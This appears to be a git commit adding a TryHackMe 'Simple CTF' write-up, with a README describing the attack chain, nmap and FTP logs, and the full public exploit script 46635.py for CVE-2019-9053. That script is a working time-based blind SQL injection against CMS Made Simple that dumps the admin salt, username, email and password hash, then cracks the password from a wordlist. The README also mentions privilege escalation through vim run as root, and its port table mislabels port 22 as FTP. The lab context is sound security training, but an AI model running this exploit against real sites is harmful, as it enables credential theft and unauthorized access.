TryHackME: Add Simple CTF machine

Author: Hedrobyte

TryHackMe/README.MD

@@ -8,4 +8,5 @@ This folder contains my notes and resolutions for the TryHackMe challenges. It i
 | Rooms                                   | Difficulty |
 |-----------------------------------------|------------|
 |[Pickle Rick](./challenges/pickle_rick/) | Easy       |
-|[RootMe](./challenges/rootMe/)           | Easy       |
+|[RootMe](./challenges/rootMe/)           | Easy       |
+|[Simple CTF](./challenges/simple_CTF/)   | Easy       |

TryHackMe/challenges/simple_CTF/46635.py

@@ -0,0 +1,186 @@
+#!/usr/bin/env python
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+    print "[+] Specify an url target"
+    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+    exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+    wordlist += options.wordlist
+
+def crack_password():
+    global password
+    global output
+    global wordlist
+    global salt
+    dict = open(wordlist)
+    for line in dict.readlines():
+        line = line.replace("\n", "")
+        beautify_print_try(line)
+        if hashlib.md5(str(salt) + line).hexdigest() == password:
+            output += "\n[+] Password cracked: " + line
+            break
+    dict.close()
+
+def beautify_print_try(value):
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+    cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+    global flag
+    global salt
+    global output
+    ord_salt = ""
+    ord_salt_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_salt = salt + dictionary[i]
+            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_salt)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            salt = temp_salt
+            ord_salt = ord_salt_temp
+    flag = True
+    output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+    global flag
+    global password
+    global output
+    ord_password = ""
+    ord_password_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_password = password + dictionary[i]
+            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_password)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            password = temp_password
+            ord_password = ord_password_temp
+    flag = True
+    output += '\n[+] Password found: ' + password
+
+def dump_username():
+    global flag
+    global db_name
+    global output
+    ord_db_name = ""
+    ord_db_name_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_db_name = db_name + dictionary[i]
+            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_db_name)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            db_name = temp_db_name
+            ord_db_name = ord_db_name_temp
+    output += '\n[+] Username found: ' + db_name
+    flag = True
+
+def dump_email():
+    global flag
+    global email
+    global output
+    ord_email = ""
+    ord_email_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_email = email + dictionary[i]
+            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_email)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            email = temp_email
+            ord_email = ord_email_temp
+    output += '\n[+] Email found: ' + email
+    flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+    print colored("[*] Now try to crack password")
+    crack_password()
+
+beautify_print()

TryHackMe/challenges/simple_CTF/FTP_cli

@@ -0,0 +1,36 @@
+└─$ ftp 10.10.6.153   
+Connected to 10.10.6.153.
+220 (vsFTPd 3.0.3)
+Name (10.10.6.153:kali): anonymous
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -al
+229 Entering Extended Passive Mode (|||43952|)
+ftp: Can't connect to `10.10.6.153:43952': Connection timed out
+200 EPRT command successful. Consider using EPSV.
+150 Here comes the directory listing.
+drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 .
+drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
+drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
+226 Directory send OK.
+        ftp> cd pub
+250 Directory successfully changed.
+ftp> ls -al
+200 EPRT command successful. Consider using EPSV.
+150 Here comes the directory listing.
+drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 .
+drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
+-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
+226 Directory send OK. 
+ftp> get ForMitch.txt
+local: ForMitch.txt remote: ForMitch.txt
+200 EPRT command successful. Consider using EPSV.
+150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
+100% |********************|   166        1.18 MiB/s    00:00 ETA
+226 Transfer complete.
+166 bytes received in 00:00 (0.39 KiB/s)
+ftp> exit
+221 Goodbye.
+└─$ cat ForMitch.txt                                
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

TryHackMe/challenges/simple_CTF/ForMitch.txt

@@ -0,0 +1 @@
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

TryHackMe/challenges/simple_CTF/README.md

@@ -0,0 +1,79 @@
+## General Information
+- Room: Simple CTF
+- Difficulty: Easy
+- Date: 16/03/2023
+- Description: Beginner level ctf.
+
+
+## Methodology
+- Reconnaissance: 
+    - Port scanning to identify open ports, services, and versions.
+    - Directory enumeration to discover potential entry points.
+- Exploration:
+    - Exploitation of identified vulnerabilities to gain unauthorized access.
+    - Privilege escalation to obtain higher levels of access privileges.
+- Results Analysis:
+    - Documentation of findings, including vulnerability identification and remediation recommendations.
+  
+
+## Results
+Three open ports were discovered on the target system that were running FTP, HTTP, and SSH services. GoBuster was utilized to scan the target and revealed the existence of a directory named /simple. Further investigation of this directory exposed crucial information about the target system, including its underlying CMS Made Simple 2.2 version.
+
+An anonymous FTP connection was established to the system, and by exploiting a security flaw, a file containing the message "Damn man... you're the worst dev I've seen. You set the same password for the system user, and the password is so weak... I cracked it in seconds. Gosh... what a mess!" was discovered.
+
+Using the SearchSploit tool, a vulnerability search was initiated for the specific CMS Made Simple 2.2 version. A relevant exploit was located and subsequently downloaded to the local system using the command "searchsploit -m php/webapps/46635.py".
+
+The downloaded 46635.py exploit was then utilized to retrieve the credentials by passing the target site address as an argument. The obtained credentials were then used to establish an SSH connection to the target system. Once access to the system was obtained, a privilege escalation vulnerability was exploited, leading to the discovery of the root.txt flag.
+
+### Reconnaissance
+- IP: 10.10.6.153
+- Port Scan results:
+
+| Port     | State | Service | Version         |
+|----------|-------|---------|-----------------|   
+| 22/tcp   | open  | ftp     | vsftpd 3.0.3 |
+| 80/tcp   | open  | http    |    Apache httpd 2.4.18 ((Ubuntu)) | 
+| 2222/tcp | open  | ssh     | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) |
+
+- ftp-anon: Anonymous FTP login allowed (FTP code 230)
+
+### Exploitation
+
+#### nmap scan
+~~~nmap
+nmap -sVC -T4 --open -oA ./nmap/service_scan 10.10.6.153
+~~~
+
+#### gobuster
+~~~ gobuster
+gobuster dir -u 10.10.6.153 - 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee scan_gobuster_dir    
+~~~
+
+#### FTP
+~~~ftp 
+ftp 10.10.6.153   
+~~~
+
+#### searchsploit
+~~~searchsploit
+└─$ searchsploit cms made simple 2.2 
+~~~
+
+#### SSH
+~~~ssh
+ssh [email protected] -p 2222
+~~~
+
+
+## Exploited Vulnerabilities
+- FTP Anonymous Login and Weak Password: The FTP service allowed anonymous login, and it was discovered that the system user had set the same weak password for both the system and FTP accounts. This security flaw allowed unauthorized access to the system.
+- CMS Made Simple 2.2 SQL Injection: A vulnerability in the CMS Made Simple version 2.2 was exploited using an SQL injection attack. This vulnerability provided an entry point to access sensitive information and execute unauthorized actions on the target system.
+- Privilege Escalation via Vim: A privilege escalation vulnerability was identified, allowing the mitch user to run the vim command with root privileges. By exploiting this vulnerability, the root account was accessed, providing full control over the system.
+
+
+## Recommendations
+- Keep the system and all installed software up to date with the latest security patches to address known vulnerabilities.
+- Enforce strong and unique passwords for all user accounts, avoiding the use of weak or default credentials. Implement two-factor authentication (2FA) where possible.
+- Restrict or disable anonymous FTP access and enforce secure FTP configurations, such as using SFTP (SSH File Transfer Protocol) instead of traditional FTP.
+- Ensure secure coding practices are followed when developing web applications to prevent common vulnerabilities like SQL injection and other code injection attacks.
+- Implement the principle of least privilege, granting users only the permissions necessary for their specific roles and responsibilities.

TryHackMe/challenges/simple_CTF/nmap/.gnmap

@@ -0,0 +1 @@
+# Nmap 7.93 scan initiated Thu Mar 16 12:39:12 2023 as: nmap -sVC -T4 --open -oA ./nmap/ service_scan 10.10.6.153

TryHackMe/challenges/simple_CTF/nmap/.nmap

@@ -0,0 +1,2 @@
+# Nmap 7.93 scan initiated Thu Mar 16 12:39:12 2023 as: nmap -sVC -T4 --open -oA ./nmap/ service_scan 10.10.6.153
+Failed to resolve "service_scan".

TryHackMe/challenges/simple_CTF/nmap/.xml

@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Thu Mar 16 12:39:12 2023 as: nmap -sVC -T4 -&#45;open -oA ./nmap/ service_scan 10.10.6.153 -->
+<nmaprun scanner="nmap" args="nmap -sVC -T4 -&#45;open -oA ./nmap/ service_scan 10.10.6.153" start="1678984752" startstr="Thu Mar 16 12:39:12 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+<verbose level="0"/>
+<debugging level="0"/>
+<hosthint><status state="up" reason="unknown-response" reason_ttl="0"/>
+<address addr="10.10.6.153" addrtype="ipv4"/>
+<hostnames>
+</hostnames>
+</hosthint>

TryHackMe/challenges/simple_CTF/nmap/service_scan.gnmap

@@ -0,0 +1,4 @@
+# Nmap 7.93 scan initiated Thu Mar 16 12:40:01 2023 as: nmap -sVC -T4 --open -oA ./nmap/service_scan 10.10.6.153
+Host: 10.10.6.153 (10.10.6.153)	Status: Up
+Host: 10.10.6.153 (10.10.6.153)	Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 2222/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/	Ignored State: filtered (997)
+# Nmap done at Thu Mar 16 12:40:59 2023 -- 1 IP address (1 host up) scanned in 58.51 seconds

TryHackMe/challenges/simple_CTF/nmap/service_scan.nmap

@@ -0,0 +1,36 @@
+# Nmap 7.93 scan initiated Thu Mar 16 12:40:01 2023 as: nmap -sVC -T4 --open -oA ./nmap/service_scan 10.10.6.153
+Nmap scan report for 10.10.6.153 (10.10.6.153)
+Host is up (0.27s latency).
+Not shown: 997 filtered tcp ports (no-response)
+Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
+PORT     STATE SERVICE VERSION
+21/tcp   open  ftp     vsftpd 3.0.3
+| ftp-syst: 
+|   STAT: 
+| FTP server status:
+|      Connected to ::ffff:10.8.78.245
+|      Logged in as ftp
+|      TYPE: ASCII
+|      No session bandwidth limit
+|      Session timeout in seconds is 300
+|      Control connection is plain text
+|      Data connections will be plain text
+|      At session startup, client count was 2
+|      vsFTPd 3.0.3 - secure, fast, stable
+|_End of status
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_Can't get directory listing: TIMEOUT
+80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
+|_http-title: Apache2 Ubuntu Default Page: It works
+| http-robots.txt: 2 disallowed entries 
+|_/ /openemr-5_0_1_3 
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 294269149ecad917988c27723acda923 (RSA)
+|   256 9bd165075108006198de95ed3ae3811c (ECDSA)
+|_  256 12651b61cf4de575fef4e8d46e102af6 (ED25519)
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Thu Mar 16 12:40:59 2023 -- 1 IP address (1 host up) scanned in 58.51 seconds